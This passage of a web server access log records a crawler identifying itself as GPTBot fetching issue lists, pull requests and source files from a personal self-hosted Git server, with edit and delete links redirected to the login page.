"https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33357] [Gzip 10.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33385] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33386] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33386] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33384] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11128] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:18:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" +[17/Feb/2026:18:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:18:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=closed&type=all" +[17/Feb/2026:18:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp?display=source" [Client 74.7.227.38] [Length 13194] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp?display=source" [Client 74.7.227.38] [Length 11411] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv?display=rendered" [Client 74.7.227.38] [Length 11221] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:18:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fPostgresWatchdog.spec" [Client 74.7.227.38] [Length 20117] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:18:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py?display=source" [Client 74.7.227.38] [Length 17215] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:18:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/main.py" +[17/Feb/2026:18:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:17:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/js/$%7BgetInvestingUrl(symbol)%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:18:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:18:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:18:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:18:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:18:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:18:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:18:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10140] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" +[17/Feb/2026:18:17:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:18:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:18:17:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:18:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:18:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 965] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:18:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 1154321] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:18:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" [Client 74.7.227.38] [Length 9858] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:18:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py?display=rendered" [Client 74.7.227.38] [Length 11115] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.py" +[17/Feb/2026:18:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec?display=source" [Client 74.7.227.38] [Length 12479] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:18:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr 